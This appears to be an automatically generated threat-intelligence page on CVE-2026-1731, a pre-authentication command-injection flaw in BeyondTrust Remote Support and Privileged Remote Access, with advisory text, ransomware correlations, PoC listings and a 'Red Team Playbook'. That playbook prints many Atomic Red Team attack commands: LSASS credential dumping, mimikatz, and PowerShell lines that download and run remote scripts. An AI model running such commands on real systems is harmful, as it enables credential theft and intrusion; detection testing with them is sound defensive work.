CVE-2026-1731
Overview
This vulnerability is a pre-authentication remote code execution caused by improper input validation in BeyondTrust Remote Support and older Privileged Remote Access versions. The root cause lies in the WebSocket endpoint /nw, which accepts binary payloads without adequate sanitization, allowing injection of operating system commands. The affected components are the WebSocket service and the mechanism that retrieves the company identifier via the /get_mech_list endpoint, which is exploited to authenticate the malicious WebSocket connection.
Vulnerability Description
BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability. By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user.
Impact
An attacker can execute arbitrary operating system commands on the server hosting BeyondTrust Remote Support or affected Privileged Remote Access versions without any authentication or user interaction. This enables full system compromise, including potential data exfiltration, lateral movement within the network, and disruption of services. The vulnerability allows remote attackers to gain the same privileges as the site user context, posing severe risks to the confidentiality, integrity, and availability of affected systems.
Solution
BeyondTrust has released security advisory BT26-02 addressing this vulnerability. Users should update BeyondTrust Remote Support and Privileged Remote Access to the fixed versions specified in the advisory. Detailed patching instructions and version requirements are available at https://www.beyondtrust.com/trust-center/security-advisories/bt26-02. Applying the official patches promptly is the recommended remediation step to mitigate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
blackbasta
|
LOW | 523 | Chain Inference |
|
lockbit
|
LOW | 5 | Chain Inference |
|
nightsky
|
LOW | 2 | Chain Inference |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The critical pre-authentication remote code execution vulnerability in BeyondTrust Remote Support and certain older versions of Privileged Remote Access is a significant concern for organizations relying on these tools for secure remote access and support. This vulnerability arises from improper validation of specially crafted requests, allowing an unauthenticated attacker to execute arbitrary operating system commands with the privileges of the site user. This flaw underscores the importance of robust input validation and authentication mechanisms in software design, as it directly exposes systems to unauthorized control and manipulation.
Attack vectors for this vulnerability are particularly alarming due to the ease with which an attacker can exploit it. By sending specially crafted requests to the affected applications, an attacker can leverage the lack of pre-authentication checks to gain control over the system. This could occur through various means, such as phishing attacks that trick users into interacting with malicious links or through direct exploitation of exposed services. Once access is gained, the attacker could execute commands that lead to data exfiltration, system compromise, or lateral movement within the network, significantly amplifying the potential damage.
The real-world impact of this vulnerability is profound, especially for organizations that utilize remote access solutions for critical operations. The high CVSS score of 9.9 indicates a severe risk, as successful exploitation could lead to complete system takeover. This not only poses a threat to sensitive data but also jeopardizes the integrity and availability of services. Businesses may face operational disruptions, financial losses, and reputational damage, particularly if customer data is compromised or if regulatory compliance is violated. The potential for widespread exploitation in environments where these tools are deployed makes this vulnerability a priority for immediate attention.
To effectively detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular vulnerability assessments and penetration testing can help identify unpatched systems and potential weaknesses. Additionally, organizations should ensure that they are running the latest versions of BeyondTrust products, as updates often include critical security patches that address known vulnerabilities. Network segmentation and strict access controls can further limit the attack surface, reducing the likelihood of exploitation. Monitoring for unusual activity and implementing intrusion detection systems can also aid in early detection of attempts to exploit this vulnerability.
In conclusion, the critical pre-authentication remote code execution vulnerability in BeyondTrust Remote Support and Privileged Remote Access represents a serious threat to organizational security. The ease of exploitation, combined with the potential for significant impact, necessitates immediate action from affected organizations. By prioritizing detection, timely patching, and robust security practices, businesses can mitigate the risks associated with this vulnerability and protect their systems from unauthorized access and control.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2026-1731, accompanied by a slight increase in the Exploit Prediction Scoring System (EPSS) score, now exceeding 0.80. This uptick in activity coincides with the recent addition of this vulnerability to the Known Exploited Vulnerabilities (KEV) catalog, underscoring its growing prominence in the threat landscape. Notably, new proof-of-concept exploits have emerged publicly, including multiple GitHub repositories and a Metasploit module, which collectively lower the barrier for adversaries to weaponize this critical pre-authentication remote code execution flaw. The presence of ransomware groups known to leverage this vulnerability further elevates the risk to organizations running affected BeyondTrust Remote Support and Privileged Remote Access versions. Given these developments, the threat level has intensified, reflecting a higher likelihood of opportunistic and targeted exploitation attempts that could lead to full system compromise and lateral movement within victim networks.
Update 2 — May 16, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2026-1731, reflecting a growing exploitation trend. Our telemetry indicates a notable surge in attempts leveraging this critical pre-authentication remote code execution vulnerability, accompanied by a modest increase in the EPSS score, signaling heightened exploit likelihood. This uptick coincides with the continued availability and refinement of multiple proof-of-concept exploits and an active Metasploit module, which collectively lower the technical barrier for adversaries. The persistence of ransomware groups known to exploit this vulnerability further amplifies the operational risk, as these actors are likely to intensify targeting of vulnerable BeyondTrust Remote Support and Privileged Remote Access deployments. Consequently, the threat level has escalated to reflect an increased probability of opportunistic and targeted intrusions that could lead to full system compromise and lateral movement within affected networks. Defenders should recognize this trend as indicative of an evolving threat landscape where exploitation attempts are becoming more frequent and sophisticated.
Update 3 — July 04, 2026
CSURFACE threat intelligence has identified a notable increase in exploitation attempts targeting CVE-2026-1731, reflected by a discernible uptick in detection activity across our telemetry. This surge signals heightened adversary interest and operational tempo, likely driven by the availability of multiple new proof-of-concept exploits circulating within attacker communities. The persistence of ransomware groups known to leverage this vulnerability further compounds the risk, as these actors are poised to capitalize on the expanding attack surface. Although the EPSS score remains stable, the qualitative rise in exploitation attempts underscores an elevated likelihood of successful intrusions against unpatched BeyondTrust Remote Support and Privileged Remote Access environments. Consequently, the threat level has shifted to reflect a more aggressive exploitation landscape, necessitating increased vigilance from defenders monitoring for indicators of compromise and anomalous command execution patterns.
Update 4 — July 14, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2026-1731, accompanied by a modest uptick in the EPSS score. This increase in activity correlates with the recent addition of the vulnerability to the KEV catalog and the confirmed use of this flaw by ransomware operators, intensifying the operational urgency. Our telemetry indicates that threat actors are increasingly leveraging publicly available proof-of-concept exploits, which lowers the barrier to entry for less sophisticated adversaries and broadens the potential attacker base. This evolving exploitation landscape heightens the risk of successful remote code execution attacks against unpatched BeyondTrust Remote Support and Privileged Remote Access deployments. Consequently, the threat level has been elevated to reflect a more aggressive and widespread exploitation environment, underscoring the critical need for defenders to prioritize detection and response efforts around anomalous command execution and unauthorized access indicators.
Update 5 — July 23, 2026
CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting CVE-2026-1731, reflecting an intensification of adversary activity against vulnerable BeyondTrust Remote Support and Privileged Remote Access instances. This escalation is evidenced by an increase in telemetry signals indicating unauthorized command execution attempts, suggesting that threat actors are actively leveraging publicly available proof-of-concept exploits to conduct reconnaissance and initial access operations. The persistence of ransomware groups exploiting this vulnerability further amplifies the risk, as these actors continue to integrate CVE-2026-1731 into their attack chains. Although the EPSS score remains stable, the upward trend in exploitation attempts signals a more aggressive threat environment. Consequently, the overall threat level should be considered elevated, underscoring the urgency for defenders to enhance monitoring for anomalous behaviors consistent with remote code execution and pre-authentication compromise.
Update 6 — August 16, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2026-1731, accompanied by the emergence of new proof-of-concept tools that lower the barrier for adversaries to leverage this critical pre-authentication remote code execution vulnerability. Our telemetry indicates that threat actors, including ransomware groups, are increasingly integrating these tools into their operational workflows, resulting in a broader and more aggressive exploitation landscape. This development amplifies the risk of widespread compromise, particularly for internet-accessible BeyondTrust Remote Support and Privileged Remote Access deployments that remain unpatched or inadequately monitored. Although the EPSS score remains stable, the qualitative surge in exploitation activity and tool availability elevates the overall threat level, signaling a shift toward heightened adversary capability and intent. Defenders should interpret this as an urgent indicator of evolving tactics that demand enhanced vigilance and proactive detection measures.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Beyondtrust | Privileged Remote Access | All |
cpe:2.3:a:beyondtrust:privileged_remote_access:*:*:*:*:*:*:*:*
|
|
|
Beyondtrust | Remote Support | All |
cpe:2.3:a:beyondtrust:remote_support:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) unauthenticated Remote Code Execution
exploits/linux/http/beyondtrust_pra_rs_command_injection
|
Harsh Jaiswal, Jonah Burgess (CryptoCat) | Unknown | linux, unix | View |
GitHub PoCs (7)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
win3zz/CVE-2026-1731
CVE-2026-1731 - Critical command injection vulnerability in BeyondTrust Remote Support and Privileged Remote Access due ...
|
win3zz | 36 | 8 | 2026-02-11 | View |
|
jakubie07/CVE-2026-1731
CVE-2026-1731 PoC
|
jakubie07 | 6 | 0 | 2026-02-18 | View |
|
cybrdude/cve-2026-1731-scanner
Passive vulnerability scanner for CVE-2026-1731 — BeyondTrust RS/PRA pre-auth RCE (CVSS 9.9). Educational & defensive us...
|
cybrdude | 4 | 0 | 2026-02-13 | View |
|
ridhinva/beyondtrust-rce-scanner
Scanner: CVE-2026-1731 BeyondTrust Remote Support Pre-auth RCE — Python checker for actively exploited vulnerability (CI...
|
ridhinva | 0 | 0 | 2026-05-22 | View |
|
PoC
|
- | 0 | 0 | - | View |
|
ridhinva/CVE-2026-1731-BeyondTrust-RCE
BeyondTrust Remote Support / PRA Pre-auth RCE Scanner
|
ridhinva | 0 | 0 | 2026-05-22 | View |
|
hexissam/CVE-2026-1731
CVE-2026-1731 — BeyondTrust Remote Code Execution Vulnerability
|
hexissam | 0 | 0 | 2026-02-22 | View |
Ransomware Groups 3
Threat Feed
39 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability (5 known victims)
Ransomware group known to exploit this vulnerability (2 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability (5 known victims)
Ransomware group known to exploit this vulnerability (2 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
52%
|
High | High | |
| CAPEC-6 | Argument Injection |
48%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
76 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-1731 |
| beyondtrustcorp.service-now.com |
GitHub CVE
|
https://beyondtrustcorp.service-now.com/csm?id=csm_kb_article&sysparm_article=KB0023293 |
| beyondtrust.com |
GitHub CVE
|
https://www.beyondtrust.com/trust-center/security-advisories/bt26-02 |
| github.com |
NVD API
Exploit
Third Party Advisory
|
https://github.com/win3zz/CVE-2026-1731 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-1731 |
| greynoise.io |
NVD API
Third Party Advisory
|
https://www.greynoise.io/blog/reconnaissance-beyondtrust-rce-cve-2026-1731 |